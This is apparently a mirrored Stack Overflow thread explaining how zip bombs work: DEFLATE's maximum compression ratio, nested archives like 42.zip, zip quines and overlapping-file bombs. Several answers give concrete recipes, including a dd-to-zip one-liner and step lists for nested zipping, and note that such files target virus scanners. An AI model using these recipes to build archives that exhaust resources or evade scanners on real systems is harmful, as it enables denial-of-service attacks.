How does one make a Zip bomb?

AlgorithmCompression

Algorithm Problem Overview


This question about zip bombs naturally led me to the Wikipedia page on the topic. The article mentions an example of a 45.1 kb zip file that decompresses to 1.3 exabytes.

What are the principles/techniques that would be used to create such a file in the first place? I don't want to actually do this, more interested in a simplified "how-stuff-works" explanation of the concepts involved.

The article mentions 9 layers of zip files, so it's not a simple case of zipping a bunch of zeros. Why 9, why 10 files in each?

Algorithm Solutions


Solution 1 - Algorithm

Citing from the Wikipedia page:

> One example of a Zip bomb is the file > 45.1.zip which was 45.1 kilobytes of compressed data, containing nine > layers of nested zip files in sets of > 10, each bottom layer archive > containing a 1.30 gigabyte file for a > total of 1.30 exabytes of uncompressed > data.

So all you need is one single 1.3GB file full of zeroes, compress that into a ZIP file, make 10 copies, pack those into a ZIP file, and repeat this process 9 times.

This way, you get a file which, when uncompressed completely, produces an absurd amount of data without requiring you to start out with that amount.

Additionally, the nested archives make it much harder for programs like virus scanners (the main target of these "bombs") to be smart and refuse to unpack archives that are "too large", because until the last level the total amount of data is not that much, you don't "see" how large the files at the lowest level are until you have reached that level, and each individual file is not "too large" - only the huge number is problematic.

Solution 2 - Algorithm

Create a 1.3 exabyte file of zeros.

Right click > Send to compressed (zipped) folder.

Solution 3 - Algorithm

This is easily done under Linux using the following command:

dd if=/dev/zero bs=1024 count=10000 | zip zipbomb.zip -

Replace count with the number of KB you want to compress. The example above creates a 10MiB zip bomb (not much of a bomb at all, but it shows the process).

You DO NOT need hard disk space to store all the uncompressed data.

Solution 4 - Algorithm

Below is for Windows:

From the Security Focus proof of concept (NSFW!), it's a ZIP file with 16 folders, each with 16 folders, which goes on like so (42 is the zip file name):

> \42\lib 0\book 0\chapter 0\doc 0\0.dll
> ...
> \42\lib F\book F\chapter F\doc F\0.dll

I'm probably wrong with this figure, but it produces 4^16 (4,294,967,296) directories. Because each directory needs allocation space of N bytes, it ends up being huge. The dll file at the end is 0 bytes.

Unzipped the first directory alone \42\lib 0\book 0\chapter 0\doc 0\0.dll results in 4gb of allocation space.

Solution 5 - Algorithm

Serious answer:

(Very basically) Compression relies on spotting repeating patterns, so the zip file would contain data representing something like

0x100000000000000000000000000000000000  
(Repeat this '0' ten trillion times)

Very short zip file, but huge when you expand it.

Solution 6 - Algorithm

To create one in a practical setting (i.e. without creating a 1.3 exabyte file on you enormous harddrive), you would probably have to learn the file format at a binary level and write something that translates to what your desired file would look like, post-compression.

Solution 7 - Algorithm

> The article mentions 9 layers of zip files, so it's not a simple case of zipping a bunch of zeros. Why 9, why 10 files in each?

First off, the Wikipedia article currently says 5 layers with 16 files each. Not sure where the discrepancy comes from, but it's not all that relevant. The real question is why use nesting in the first place.

DEFLATE, the only commonly supported compression method for zip files*, has a maximum compression ratio of 1032. This can be achieved asymptotically for any repeating sequence of 1-3 bytes. No matter what you do to a zip file, as long as it is only using DEFLATE, the unpacked size will be at most 1032 times the size of the original zip file.

Therefore, it is necessary to use nested zip files to achieve really outrageous compression ratios. If you have 2 layers of compression, the maximum ratio becomes 1032^2 = 1065024. For 3, it's 1099104768, and so on. For the 5 layers used in 42.zip, the theoretical maximum compression ratio is 1170572956434432. As you can see, the actual 42.zip is far from that level. Part of that is the overhead of the zip format, and part of it is that they just didn't care.

If I had to guess, I'd say that 42.zip was formed by just creating a large empty file, and repeatedly zipping and copying it. There is no attempt to push the limits of the format or maximize compression or anything - they just arbitrarily picked 16 copies per layer. The point was to create a large payload without much effort.

Note: Other compression formats, such as bzip2, offer much, much, much larger maximum compression ratios. However, most zip parsers don't accept them.

P.S. It is possible to create a zip file which will unzip to a copy of itself (a quine). You can also make one that unzips to multiple copies of itself. Therefore, if you recursively unzip a file forever, the maximum possible size is infinite. The only limitation is that it can increase by at most 1032 on each iteration.

P.P.S. The 1032 figure assumes that file data in the zip are disjoint. One quirk of the zip file format is that it has a central directory which lists the files in the archive and offsets to the file data. If you create multiple file entries pointing to the same data, you can achieve much higher compression ratios even with no nesting, but such a zip file is likely to be rejected by parsers.

Solution 8 - Algorithm

A nice way to create a zipbomb (or gzbomb) is to know the binary format you are targeting. Otherwise, even if you use a streaming file (for example using /dev/zero) you'll still be limited by computing power needed to compress the stream.

A nice example of a gzip bomb: http://selenic.com/googolplex.gz57 (there's a message embedded in the file after several level of compression resulting in huge files)

Have fun finding that message :)

Solution 9 - Algorithm

Silicon Valley Season 3 Episode 7 brought me here. The steps to generate a zip bomb would be.

  1. Create a dummy file with zeros (or ones if you think they're skinny) of size (say 1 GB).
  2. Compress this file to a zip-file say 1.zip.
  3. Make n (say 10) copies of this file and add these 10 files to a compressed archive (say 2.zip).
  4. Repeat step 3 k number of times.
  5. You'll get a zip bomb.

For a Python implementation, check this.

Solution 10 - Algorithm

Perhaps, on unix, you could pipe a certain amount of zeros directly into a zip program or something? Don't know enough about unix to explain how you would do that though. Other than that you would need a source of zeros, and pipe them into a zipper that read from stdin or something...

Solution 11 - Algorithm

All file compression algorithms rely on the entropy of the information to be compressed. Theoretically you can compress a stream of 0's or 1's, and if it's long enough, it will compress very well.

That's the theory part. The practical part has already been pointed out by others.

Solution 12 - Algorithm

Recent (post 1995) compression algorithms like bz2, lzma (7-zip) and rar give spectacular compression of monotonous files, and a single layer of compression is sufficient to wrap oversized content to a managable size.

Another approach could be to create a sparse file of extreme size (exabytes) and then compress it with something mundane that understands sparse files (eg tar), now if the examiner streams the file the examiner will need to read past all those zeros that exist only to pad between the actual content of the file, if the examiner writes it to disk however very little space will be used (assuming a well-behaved unarchiver and a modern filesystem).

Solution 13 - Algorithm

Tried it. the output zip file size was a small 84-KB file.

Steps I made so far:

  1. create a 1.4-GB .txt file full of '0'
  2. compress it.
  3. rename the .zip to .txt then make 16 copies
  4. compresse all of it into a .zip file,
  5. rename the renamed .txt files inside the .zip file into .zip again
  6. repeat steps 3 to 5 eight times.
  7. Enjoy :)

though i dont know how to explain the part where the compression of the renamed zip file still compresses it into a smaller size, but it works. Maybe i just lack the technical terms.

Solution 14 - Algorithm

I don't know if ZIP uses Run Length Encoding, but if it did, such a compressed file would contain a small piece of data and a very large run-length value. The run-length value would specify how many times the small piece of data is repeated. When you have a very large value, the resultant data is proportionally large.

Solution 15 - Algorithm

It is not necessary to use nested files, you can take advantage of the zip format to overlay data.

https://www.bamsoftware.com/hacks/zipbomb/

"This article shows how to construct a non-recursive zip bomb that achieves a high compression ratio by overlapping files inside the zip container. "Non-recursive" means that it does not rely on a decompressor's recursively unpacking zip files nested within zip files: it expands fully after a single round of decompression. The output size increases quadratically in the input size, reaching a compression ratio of over 28 million (10 MB → 281 TB) at the limits of the zip format. Even greater expansion is possible using 64-bit extensions. The construction uses only the most common compression algorithm, DEFLATE, and is compatible with most zip parsers."

"Compression bombs that use the zip format must cope with the fact that DEFLATE, the compression algorithm most commonly supported by zip parsers, cannot achieve a compression ratio greater than 1032. For this reason, zip bombs typically rely on recursive decompression, nesting zip files within zip files to get an extra factor of 1032 with each layer. But the trick only works on implementations that unzip recursively, and most do not. The best-known zip bomb, 42.zip, expands to a formidable 4.5 PB if all six of its layers are recursively unzipped, but a trifling 0.6 MB at the top layer. Zip quines, like those of Ellingsen and Cox, which contain a copy of themselves and thus expand infinitely if recursively unzipped, are likewise perfectly safe to unzip once."

Attributions

All content for this solution is sourced from the original question on Stackoverflow.

The content on this page is licensed under the Attribution-ShareAlike 4.0 International (CC BY-SA 4.0) license.

Content TypeOriginal AuthorOriginal Content on Stackoverflow
QuestionpufferfishView Question on Stackoverflow
Solution 1 - AlgorithmMichael BorgwardtView Answer on Stackoverflow
Solution 2 - AlgorithmwefwfwefweView Answer on Stackoverflow
Solution 3 - AlgorithmThomiView Answer on Stackoverflow
Solution 4 - AlgorithmChris SView Answer on Stackoverflow
Solution 5 - AlgorithmwefwfwefweView Answer on Stackoverflow
Solution 6 - AlgorithmAndy_VulhopView Answer on Stackoverflow
Solution 7 - AlgorithmAntimonyView Answer on Stackoverflow
Solution 8 - AlgorithmtonfaView Answer on Stackoverflow
Solution 9 - AlgorithmAbdul FatirView Answer on Stackoverflow
Solution 10 - AlgorithmSvishView Answer on Stackoverflow
Solution 11 - AlgorithmCalythView Answer on Stackoverflow
Solution 12 - Algorithmuser340140View Answer on Stackoverflow
Solution 13 - AlgorithmjaycrollView Answer on Stackoverflow
Solution 14 - AlgorithmJoeView Answer on Stackoverflow
Solution 15 - Algorithmuser15278861View Answer on Stackoverflow